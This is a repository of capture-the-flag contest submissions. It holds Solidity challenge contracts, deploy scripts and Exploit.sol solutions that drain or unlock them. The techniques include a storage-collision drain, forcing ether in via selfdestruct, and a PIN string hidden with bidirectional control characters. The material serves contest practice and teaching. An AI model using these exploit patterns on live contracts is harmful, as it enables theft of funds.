├── 0xNazgul ├── README.md ├── contracts │ ├── Exploit.sol │ ├── FloraToken.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── 0xmoostorm ├── .gitignore ├── README.md ├── contracts │ ├── CollisionExchange.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── Baraa42 ├── .env.example ├── .gitattributes ├── .gitignore ├── README.md ├── brownie-config.yaml ├── contracts │ ├── Casino.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── interfaces │ └── ICasino.sol └── scripts │ ├── __init__.py │ └── helpful_scripts.py ├── BowTiedPickle ├── Exploit.sol ├── ISetup.sol ├── Padlock.sol ├── README.md └── Setup.sol ├── EXTRA.md ├── GUIDE.md ├── JustDravee ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── SheerLocking.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── KahanMajmudar ├── .gitignore ├── .prettierrc ├── README.md ├── contracts │ ├── CustomMarketplace.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json └── scripts │ ├── deploy.js │ └── solving.js ├── PeterisPrieditis ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ ├── StableSwap2.sol │ └── test │ │ └── TestERC20.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── test │ └── deployment.js ├── README.md ├── RomiRand ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── Unbreakable.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── 
solving.js └── yarn.lock ├── Thro77le ├── .gitignore ├── README.md ├── contracts │ ├── Challenge.sol │ ├── Dummy.sol │ ├── Exploit.sol │ ├── Factory.sol │ └── Setup.sol ├── hardhat.config.ts ├── package.json ├── scripts │ ├── deploy.ts │ └── solve.ts ├── test │ └── sherlock.test.ts ├── tsconfig.json └── yarn.lock ├── WRITEUPS.md ├── agusduha ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── TheKingIsDeadLongLiveTheKing.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── bahurum ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Inflation.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── band0x ├── BecomeMaster.js ├── BecomeMaster.sol ├── Exploit.sol ├── ISetup.sol ├── README.md └── Setup.sol ├── chaboo ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── SwissTreasury.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ ├── arguments.js │ │ ├── deploy.js │ │ └── verify.js │ ├── hardhat │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── ebaizel ├── .gitignore ├── README.md └── contracts │ ├── Exploit.sol │ ├── PixelPavel.sol │ └── Setup.sol ├── hack3r-0m ├── .gitignore ├── README.md ├── contracts │ ├── BitMania.sol │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── solution.py ├── hardhat.config.js ├── package.json ├── scripts │ └── goerli │ │ └── deploy.js └── yarn.lock ├── iflp ├── .gitignore ├── README.md ├── contracts │ ├── ExampleQuizExploit.sol │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Lollercoaster.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── johngish ├── README.md └── contracts │ ├── Challenge.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── 
Setup.sol ├── kankan-0 ├── README.md ├── contracts │ ├── Dead.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol └── scripts │ └── goerli │ └── deploy.js ├── kuldeep23907 ├── .gitignore ├── README.md ├── contracts │ ├── Challenge.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── lucyoa ├── .gitignore ├── README.md ├── contracts │ ├── Challenge.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json └── scripts │ ├── goerli │ └── deploy.js │ └── solving.js ├── luksgrin ├── README.md ├── contracts │ ├── HauntedDungeon.sol │ ├── HauntedDungeonExploit.sol │ ├── ISetup.sol │ └── Setup.sol └── instructions │ ├── README.md │ └── reference │ ├── README.md │ ├── contracts │ ├── ExampleQuizExploit.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol │ ├── hardhat.config.js │ ├── package.json │ ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js │ └── yarn.lock ├── mhchia ├── .gitignore ├── README.md ├── contracts │ ├── CrowdFunding.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── naps62 ├── .eslintignore ├── .eslintrc.js ├── .gitignore ├── .prettierrc ├── .projections.json ├── .solhint.json ├── .solhintignore ├── LICENSE ├── README.md ├── contracts │ ├── BuiltByANoob.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── deploy │ └── deploy.ts ├── deployments │ └── goerli │ │ ├── .chainId │ │ ├── Setup.json │ │ └── solcInputs │ │ └── 41ffeb281b20b007621397302f2675e8.json ├── hardhat.config.ts ├── package.json ├── test │ └── example.ts ├── tsconfig.json └── yarn.lock ├── plotchy ├── .gitattributes ├── .gitignore ├── HouseOfMirrorsCallMap.ods ├── README.md ├── brownie-config.yaml ├── contracts │ ├── AmusementPark.sol │ ├── Exploit.sol │ 
├── ISetup.sol │ └── Setup.sol ├── scripts │ ├── __init__.py │ ├── helpful_scripts.py │ └── solve.py └── tests │ ├── __init__.py │ └── test_unit.py ├── saianmk ├── .gitignore ├── README.md ├── contracts │ ├── Combination.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── test │ └── combination.js ├── score.json ├── sidduHERE ├── .gitignore ├── README.md ├── contracts │ ├── ExampleQuizExploit.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── smbsp ├── .gitignore ├── README.md ├── contracts │ ├── CollectReward.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── solves.json ├── t-nero ├── README.md ├── contracts │ ├── Exploit.sol │ ├── Exploit2.sol │ ├── ISetup.sol │ ├── Monopoly.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ └── deploy.js └── test │ ├── test.js │ └── test2.js ├── teryanarmen ├── .eslintignore ├── .eslintrc.js ├── .gitignore ├── .npmignore ├── .prettierignore ├── README.md ├── contracts │ ├── Challenge2.sol │ ├── Exploit.sol │ └── Setup.sol ├── hardhat.config.ts ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.ts │ └── solve.ts ├── src │ └── types │ │ ├── Challenge.ts │ │ ├── Challenge2.ts │ │ ├── Exploit1.ts │ │ ├── Exploit2.ts │ │ ├── Exploit3.ts │ │ ├── Exploit4.ts │ │ ├── ExploitHelper.ts │ │ ├── ExploitMain.ts │ │ ├── ICalled.ts │ │ ├── ISetup.ts │ │ ├── Setup.ts │ │ ├── common.ts │ │ ├── factories │ │ ├── Challenge2__factory.ts │ │ ├── Challenge__factory.ts │ │ ├── Exploit1__factory.ts │ │ ├── Exploit2__factory.ts │ │ ├── Exploit3__factory.ts │ │ ├── Exploit4__factory.ts │ │ ├── 
ExploitHelper__factory.ts │ │ ├── ExploitMain__factory.ts │ │ ├── ICalled__factory.ts │ │ ├── ISetup__factory.ts │ │ └── Setup__factory.ts │ │ ├── hardhat.d.ts │ │ └── index.ts └── tsconfig.json ├── tqtsar ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── Fundraising.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── wuwe1 ├── .gitattributes ├── .gitignore ├── README.md ├── brownie-config.yaml ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── Superfluid.sol └── tests │ └── test_exploit.py └── ych18 ├── Exploit.sol ├── FunnyChallenges.sol ├── ISetup.sol ├── README.md └── Setup.sol /0xNazgul/README.md: -------------------------------------------------------------------------------- 1 | # Draft CTF submission 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | FloraToken.sol | [0x75b665c3695293659949c18719d046089F423834](https://goerli.etherscan.io/address/0x75b665c3695293659949c18719d046089f423834) | 7 | | Setup.sol | [0xd80960575d177A09FEb8497dBaE9F6583fcFe297](https://goerli.etherscan.io/address/0xd80960575d177a09feb8497dbae9f6583fcfe297) | 8 | 9 | `.env` file 10 | 11 | ``` 12 | ETHERSCAN_API= 13 | ALCHEMY_API_KEY_GOERLI= 14 | PRIVATE_KEY= 15 | ``` 16 | -------------------------------------------------------------------------------- /0xNazgul/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /0xNazgul/hardhat.config.js: 
--------------------------------------------------------------------------------
require("@nomiclabs/hardhat-waffle");
require("@nomiclabs/hardhat-etherscan");
require("dotenv").config();

// All three values are credentials. They are read from the environment
// (dotenv loads a local `.env` above), so none is hard-coded in this file;
// an unset variable becomes "".
// NOTE(review): the directory listing for this submission shows no .gitignore,
// so confirm that `.env` (which holds PRIVATE_KEY) is kept out of version
// control by some other rule before filling it in.
const env = process.env;
const ETHERSCAN_API = env.ETHERSCAN_API || "";
const ALCHEMY_API_KEY_GOERLI = env.ALCHEMY_API_KEY_GOERLI || "";
const PRIVATE_KEY = env.PRIVATE_KEY || "";

// With no key configured the goerli network gets an empty account list
// rather than a list holding an empty string.
const goerliSigners = PRIVATE_KEY === "" ? [] : [PRIVATE_KEY];

// Sample task from the Hardhat template; see
// https://hardhat.org/guides/create-task.html
// It prints addresses only, never key material.
task("accounts", "Prints the list of accounts", async (_taskArgs, hre) => {
  const signers = await hre.ethers.getSigners();

  signers.forEach(({ address }) => {
    console.log(address);
  });
});

// Hardhat reads its configuration from the exported object;
// see https://hardhat.org/config/

/**
 * @type import('hardhat/config').HardhatUserConfig
 */
module.exports = {
  solidity: "0.8.4",
  etherscan: {
    // Etherscan API key, used for source verification
    // (obtain one at https://etherscan.io/)
    apiKey: ETHERSCAN_API,
  },
  networks: {
    goerli: {
      // The Alchemy key is part of the URL, so treat the whole URL as a
      // credential when logging or sharing configuration.
      url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`,
      // Fixed gas price in wei (900 gwei).
      gasPrice: 900000000000,
      accounts: goerliSigners,
    },
  },
};
--------------------------------------------------------------------------------
/0xNazgul/package.json:
--------------------------------------------------------------------------------
{
  "name": "hardhat-project",
  "devDependencies": {
    "@nomiclabs/hardhat-ethers": "^2.0.4",
    "@nomiclabs/hardhat-waffle": "^2.0.2",
    "chai": "^4.3.6",
    "ethereum-waffle": "^3.4.0",
    "ethers": "^5.5.3",
    "hardhat": "^2.8.3"
  },
  "dependencies": {
    "@nomiclabs/hardhat-etherscan": "^3.0.0",
    "@openzeppelin/contracts": "^4.5.0",
    "dotenv": "^14.3.2"
  }
}
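--------------------------------------------------------------------------------
/0xNazgul/scripts/goerli/deploy.js:
--------------------------------------------------------------------------------
const { parseEther } = require("ethers/lib/utils");
const hre = require("hardhat");

/**
 * Resolve after the given number of seconds.
 * @param {number} seconds
 * @returns {Promise<void>}
 */
function sleep(seconds) {
  return new Promise((resolve) => setTimeout(resolve, seconds * 1000));
}

/**
 * Deploy Setup funded with 1 ether, look up the challenge instance it
 * created, then submit both addresses to Etherscan for source verification.
 *
 * `ethers` is not imported in this file; the script presumably relies on the
 * global that `hardhat run` provides.
 */
async function main() {
  const SETUP = await ethers.getContractFactory("Setup");

  const setup = await SETUP.deploy({ value: parseEther("1") });
  await setup.deployed();

  // NOTE(review): the directory listing shows no ExampleQuizExploit contract
  // in this submission, so this artifact name looks like a leftover from the
  // reference template. Confirm it against the contracts actually deployed.
  const ctf = await ethers.getContractAt(
    "ExampleQuizExploit",
    await setup.instance()
  );

  console.log("Deployed setup to", setup.address);
  console.log("Deployed ctf to", ctf.address);

  // wait for etherscan to index
  await sleep(300);

  // verify
  await hre.run("verify:verify", {
    address: setup.address,
  });
  await hre.run("verify:verify", {
    address: ctf.address,
  });
}

// Exit non-zero on any failure so callers can detect a broken deployment.
main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/0xNazgul/scripts/solving.js:
--------------------------------------------------------------------------------
const { parseEther } = require("ethers/lib/utils");

/**
 * Local check of the challenge: deploy Setup, print isSolved(), deploy the
 * Exploit contract against the instance, print isSolved() again.
 */
async function main() {
  const SETUP = await ethers.getContractFactory("Setup");
  const EXPLOIT = await ethers.getContractFactory("Exploit");

  const setup = await SETUP.deploy({ value: parseEther("1") });
  // NOTE(review): "ExampleQuizExploit" is not among this submission's
  // contracts in the directory listing. Confirm the artifact name.
  const ctf = await ethers.getContractAt(
    "ExampleQuizExploit",
    await setup.instance()
  );

  console.log("solved:", await setup.isSolved());

  await EXPLOIT.deploy(ctf.address, { value: parseEther("1") });

  console.log("solved:", await setup.isSolved());
}

main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/0xmoostorm/.gitignore:
--------------------------------------------------------------------------------
node_modules
.env
coverage
coverage.json
typechain

#Hardhat files
cache
artifacts
--------------------------------------------------------------------------------
/0xmoostorm/README.md:
--------------------------------------------------------------------------------
# Collision Exchange CTF submission

> Don't deploy the solution (`Exploit.sol`) to a public chain!

| Contract | Goerli |
| ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- |
| CollisionExchange.sol | [0xE442a00a4587677c945598e19DF41822e851c1DE](https://goerli.etherscan.io/address/0xE442a00a4587677c945598e19DF41822e851c1DE) |
| Setup.sol | [0x5e40D0d98126323b81246008d386a93BA091704f](https://goerli.etherscan.io/address/0x5e40D0d98126323b81246008d386a93BA091704f) |

`.env` file

```
ETHERSCAN_API=
ALCHEMY_API_KEY_GOERLI=
PRIVATE_KEY=
```
--------------------------------------------------------------------------------
/0xmoostorm/contracts/Exploit.sol:
--------------------------------------------------------------------------------
pragma solidity ^0.8.4;

import './CollisionExchange.sol';

/// Solution contract for the Collision Exchange challenge.
/// NOTE(review): the order of the first two state variables, together with
/// the challenge name, suggests they mirror a storage layout used by
/// CollisionExchange. That contract is not shown here, so confirm it there.
contract Exploit {

    address public orderBook;
    address public owner;

    CollisionExchange public exchange;


    /// Stores the exchange this contract will call; accepts ether.
    constructor(CollisionExchange _exchange) payable {
        exchange = CollisionExchange(_exchange);
    }

    /// Ignores `_amount` and records the caller in `owner`.
    function postTrade(uint _amount) external {
        owner = msg.sender;
    }

    /// Calls exchange.postTrade twice (first with this contract's address
    /// cast to uint, then with 1) and then exchange.emergencyWithdraw().
    function finalize() external payable {
        exchange.postTrade(uint(uint160(address(this))));
        exchange.postTrade(1);
        exchange.emergencyWithdraw();
    }

    /// Accepts plain ether transfers.
    receive() external payable {}

}
--------------------------------------------------------------------------------
/0xmoostorm/contracts/ISetup.sol:
--------------------------------------------------------------------------------
pragma solidity ^0.8.4;

/// Interface the CTF expects every challenge Setup contract to implement.
interface ISetup {
    /// Emitted with the address of each contract the Setup deploys.
    event Deployed(address instance);

    /// Returns true once the challenge counts as solved.
    function isSolved() external view returns (bool);
}
--------------------------------------------------------------------------------
/0xmoostorm/contracts/Setup.sol:
--------------------------------------------------------------------------------
pragma solidity ^0.8.4;

import './ISetup.sol';
import './CollisionExchange.sol';

/// Deploys the challenge: an OrderBook and a CollisionExchange funded with
/// exactly 1 ether.
contract Setup is ISetup {
    CollisionExchange public exchange;
    OrderBook public orderBook;

    constructor() payable {
        // Deployment must carry exactly 1 ether; it is forwarded below.
        require(msg.value == 1 ether);

        orderBook = new OrderBook();
        emit Deployed(address(orderBook));

        orderBook.postTrade(address(this), msg.value);

        exchange = new CollisionExchange(address(orderBook));
        emit Deployed(address(exchange));

        exchange.deposit{value: msg.value}();
    }

    /// Solved once the exchange holds no ether at all.
    function isSolved() external override view returns (bool) {
        return address(exchange).balance == 0;
    }
}
--------------------------------------------------------------------------------
/0xmoostorm/hardhat.config.js:
--------------------------------------------------------------------------------
require("@nomiclabs/hardhat-waffle");
require("@nomiclabs/hardhat-etherscan");
require("dotenv").config();

// Credentials are read from the environment (dotenv loads `.env`, which this
// submission's .gitignore excludes); an unset variable becomes "".
const ETHERSCAN_API = process.env.ETHERSCAN_API || "";
const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || "";
const PRIVATE_KEY = process.env.PRIVATE_KEY || "";

// This is a sample Hardhat task. To learn how to create your own go to
// https://hardhat.org/guides/create-task.html
task("accounts", "Prints the list of accounts", async (taskArgs, hre) => {
  const accounts = await hre.ethers.getSigners();

  for (const account of accounts) {
    console.log(account.address);
  }
});

// You need to export an object to set up your config
// Go to https://hardhat.org/config/ to learn more

/**
 * @type import('hardhat/config').HardhatUserConfig
 */
module.exports = {
  solidity: "0.8.4",
  etherscan: {
    // Your API key for Etherscan
    // Obtain one at https://etherscan.io/
    apiKey: ETHERSCAN_API,
  },
  networks: {
    goerli: {
      // The Alchemy key is part of the URL, so treat the whole URL as a
      // credential.
      url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`,
      // Fixed gas price in wei (900 gwei).
      gasPrice: 900000000000,
      // An empty PRIVATE_KEY yields an empty account list.
      accounts: [PRIVATE_KEY].filter((item) => item !== ""),
    },
  },
};
--------------------------------------------------------------------------------
/0xmoostorm/package.json:
--------------------------------------------------------------------------------
{
  "name": "hardhat-project",
  "devDependencies": {
    "@nomiclabs/hardhat-ethers": "^2.0.4",
    "@nomiclabs/hardhat-waffle": "^2.0.2",
    "chai": "^4.3.6",
    "ethereum-waffle": "^3.4.0",
    "ethers": "^5.5.3",
    "hardhat": "^2.8.3"
  },
  "dependencies": {
    "@nomiclabs/hardhat-etherscan": "^3.0.0",
    "dotenv": "^14.3.2"
  }
}
--------------------------------------------------------------------------------
/0xmoostorm/scripts/goerli/deploy.js:
--------------------------------------------------------------------------------
const { parseEther } = require("ethers/lib/utils");
const { ethers } = require("hardhat");
const hre = require("hardhat");

/**
 * Resolve after the given number of seconds.
 * @param {number} seconds
 * @returns {Promise<void>}
 */
function sleep(seconds) {
  return new Promise((resolve) => setTimeout(resolve, seconds * 1000));
}

/**
 * Deploy Setup funded with 1 ether, look up the CollisionExchange and
 * OrderBook it created, then submit all three addresses to Etherscan for
 * source verification.
 */
async function main() {
  const SETUP = await ethers.getContractFactory("Setup");

  console.log('BEGINNING SETUP DEPLOYMENT');

  const setup = await SETUP.deploy({ value: parseEther("1") });
  await setup.deployed();

  const ctf = await ethers.getContractAt("CollisionExchange", await setup.exchange());
  const orderBook = await ethers.getContractAt("OrderBook", await setup.orderBook());

  console.log("Deployed setup to", setup.address);
  console.log("Deployed ctf to", ctf.address);
  console.log("Deployed orderBook to", orderBook.address);

  // wait for etherscan to index
  await sleep(300);

  // verify
  // (Must stay a comment: as a bare `verify` statement this line throws a
  // ReferenceError after the contracts are already deployed, so none of the
  // verification calls below would run.)
  await hre.run("verify:verify", {
    address: setup.address,
  });
  await hre.run("verify:verify", {
    address: ctf.address,
  });
  await hre.run("verify:verify", {
    address: orderBook.address,
  });
}

// Exit non-zero on any failure so callers can detect a broken deployment.
main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/0xmoostorm/scripts/solving.js:
--------------------------------------------------------------------------------
const { parseEther } = require("ethers/lib/utils");

/**
 * Local check of the challenge: deploy Setup, print isSolved(), deploy the
 * Exploit contract, print isSolved() again.
 *
 * NOTE(review): this still follows the reference template. The Setup.sol of
 * this submission exposes exchange() and orderBook() but no instance(), and
 * the directory listing shows no ExampleQuizExploit contract, so the lookup
 * below presumably fails as written. Confirm before relying on the script.
 */
async function main() {
  const SETUP = await ethers.getContractFactory("Setup");
  const EXPLOIT = await ethers.getContractFactory("Exploit");

  const setup = await SETUP.deploy({ value: parseEther("1") });
  const ctf = await ethers.getContractAt(
    "ExampleQuizExploit",
    await setup.instance()
  );

  console.log("solved:", await setup.isSolved());

  await EXPLOIT.deploy(ctf.address, { value: parseEther("1") });

  console.log("solved:", await setup.isSolved());
}

main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
--------------------------------------------------------------------------------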
/Baraa42/.env.example: -------------------------------------------------------------------------------- 1 | export PRIVATE_KEY = 0xpR1v4T3K3y 2 | export WEB3_INFURA_PROJECT_ID = web31nFuR4pR073c71d 3 | export ETHERSCAN_TOKEN = 3T3R5c4nT0k3n 4 | -------------------------------------------------------------------------------- /Baraa42/.gitattributes: -------------------------------------------------------------------------------- 1 | *.sol linguist-language=Solidity 2 | *.vy linguist-language=Python 3 | -------------------------------------------------------------------------------- /Baraa42/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | .env 3 | .history 4 | .hypothesis/ 5 | build/ 6 | reports/ 7 | -------------------------------------------------------------------------------- /Baraa42/README.md: -------------------------------------------------------------------------------- 1 | # CTF submission 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Casino.sol | [0x31448618e0C48c6Bcb2A729709DDF51F1cA0c628](https://goerli.etherscan.io/address/0x31448618e0C48c6Bcb2A729709DDF51F1cA0c628) | 7 | | Setup.sol | [0xFfb20eF6668F8160934FD84b60F3DeD127F787Aa](https://goerli.etherscan.io/address/0xFfb20eF6668F8160934FD84b60F3DeD127F787Aa) | 8 | 9 | -------------------------------------------------------------------------------- /Baraa42/brownie-config.yaml: -------------------------------------------------------------------------------- 1 | dependencies: 2 | - OpenZeppelin/openzeppelin-contracts@3.4.0 3 | compiler: 4 | solc: 5 | remappings: 6 | - '@openzeppelin=OpenZeppelin/openzeppelin-contracts@3.4.0' 7 | dotenv: .env 8 | networks: 9 | default: development 10 | wallets: 11 | from_key: ${PRIVATE_KEY} 
--------------------------------------------------------------------------------
/Baraa42/contracts/Exploit.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: GPL-3.0

pragma solidity 0.7.3;

import "./Casino.sol";

/// @title Solution contract for the Casino challenge.
/// @notice Self-destructs in its constructor, naming the Casino as
///         beneficiary, so the attached ether reaches the Casino's balance
///         without any Casino function being called.
/// @dev Defensive reading: a contract cannot refuse ether delivered this way,
///      so accounting that assumes `address(this).balance` only changes
///      through its own payable functions can be desynchronised. Track
///      deposits in storage instead of trusting the raw balance.
contract Exploit {
    constructor(Casino instance) payable {
        // Some ether must be attached, otherwise nothing is transferred.
        require(msg.value != 0);
        selfdestruct(payable(address(instance)));
    }
}
--------------------------------------------------------------------------------
/Baraa42/contracts/ISetup.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: GPL-3.0

pragma solidity 0.7.3;

/// @title Interface the CTF expects every challenge Setup contract to implement.
interface ISetup {
    /// @notice Emitted with the address of the deployed challenge instance.
    event Deployed(address instance);

    /// @return True once the challenge counts as solved.
    function isSolved() external view returns (bool);
}
--------------------------------------------------------------------------------
/Baraa42/contracts/Setup.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: GPL-3.0

pragma solidity 0.7.3;

import "./ISetup.sol";
import "./Casino.sol";

/// @title Deploys the Casino challenge and reports whether it is solved.
contract Setup is ISetup {
    Casino public casino;

    constructor() payable {
        casino = new Casino();
        emit Deployed(address(casino));
    }

    /// @notice Solved when the Casino holds more ether than its own
    ///         bookkeeping accounts for.
    /// @dev While the game is on, the full prize total is counted; otherwise
    ///      only 25% of it is. Both comparisons are evaluated before the
    ///      game flag is read.
    /// @return True when the balance exceeds the applicable accounted total.
    function isSolved() external view override returns (bool) {
        bool exceedsFullPrizeTotal = address(casino).balance >
            casino.totalDeposits() +
                casino.totalPrize() +
                casino.totalJackpot();
        bool exceedsQuarterPrizeTotal = address(casino).balance >
            casino.totalDeposits() +
                (casino.totalPrize() * 25) /
                100 +
                casino.totalJackpot();
        bool gameIsOn = casino.gameOn();

        if (gameIsOn) {
            return exceedsFullPrizeTotal;
        }
        return exceedsQuarterPrizeTotal;
    }
}
--------------------------------------------------------------------------------
/Baraa42/interfaces/ICasino.sol:
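--------------------------------------------------------------------------------
// SPDX-License-Identifier: GPL-3.0
pragma solidity 0.7.3;

/// Minimal view of the Casino contract: its game flag and the payable
/// jackpot entry point.
interface ICasino {
    function gameOn() external view returns (bool);

    function jackpot(uint256 num, uint256 chance) external payable;
}
--------------------------------------------------------------------------------
/Baraa42/scripts/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/Baraa42/scripts/__init__.py
--------------------------------------------------------------------------------
/Baraa42/scripts/helpful_scripts.py:
--------------------------------------------------------------------------------
from brownie import accounts, network, config

FORKED_LOCAL_ENVIRONMENTS = ["mainnet-fork", "mainnet-fork-dev"]
LOCAL_BLOCKCHAIN_ENVIRONMENTS = ["development", "ganache-local", "mainnet-fork"]


def get_account(index=None, id=None):
    """Return the brownie account that scripts should sign with.

    Resolution order:
      1. ``index`` given  -> ``accounts[index]``
      2. ``id`` given     -> ``accounts.load(id)``
      3. active network is local or a local fork -> ``accounts[0]``
      4. otherwise        -> account built from ``config["wallets"]["from_key"]``

    Args:
        index: position in brownie's ``accounts`` container, or None.
        id: name passed to ``accounts.load``, or None.

    Returns:
        The selected brownie account object.
    """
    # `index` is compared with None rather than tested for truthiness, so an
    # explicit index of 0 selects accounts[0] and does not fall through to the
    # private key from the config on a live network.
    if index is not None:
        return accounts[index]
    if id:
        return accounts.load(id)
    if (
        network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS
        or network.show_active() in FORKED_LOCAL_ENVIRONMENTS
    ):
        return accounts[0]
    # Live network: the signing key comes from the project configuration.
    # Keep that value out of version control.
    return accounts.add(config["wallets"]["from_key"])
--------------------------------------------------------------------------------
/BowTiedPickle/Exploit.sol:
--------------------------------------------------------------------------------
pragma solidity 0.8.4;

import './Padlock.sol';

/// Solution contract for the Padlock challenge: calls pick1, pick2, pick3
/// and open() on the instance from its constructor.
contract Exploit {
    constructor(Padlock instance) payable {
        require(msg.value == 33);
        // NOTE(review): the string literal below appears to carry
        // bidirectional control characters around the digits (a
        // right-to-left override before them and a pop-directional-formatting
        // after), so an editor may display the digits in a different order
        // from the bytes the compiler sees. Check such literals in a hex
        // view, and have review tooling flag bidi control characters in
        // source files.
        instance.pick1(unicode"‮6167209‬");
        instance.pick2{value:33}();
        instance.pick3(0x69420000000000000000000000000000);
        instance.open();
    }
}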
-------------------------------------------------------------------------------- /BowTiedPickle/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /BowTiedPickle/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/BowTiedPickle/README.md -------------------------------------------------------------------------------- /BowTiedPickle/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './Padlock.sol'; 5 | 6 | contract Setup is ISetup { 7 | Padlock public instance; 8 | 9 | constructor() payable { 10 | string memory PIN = unicode"‮6167209‬"; 11 | 12 | instance = new Padlock(PIN); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | bool unlocked = instance.opened(); 18 | return unlocked; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /JustDravee/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 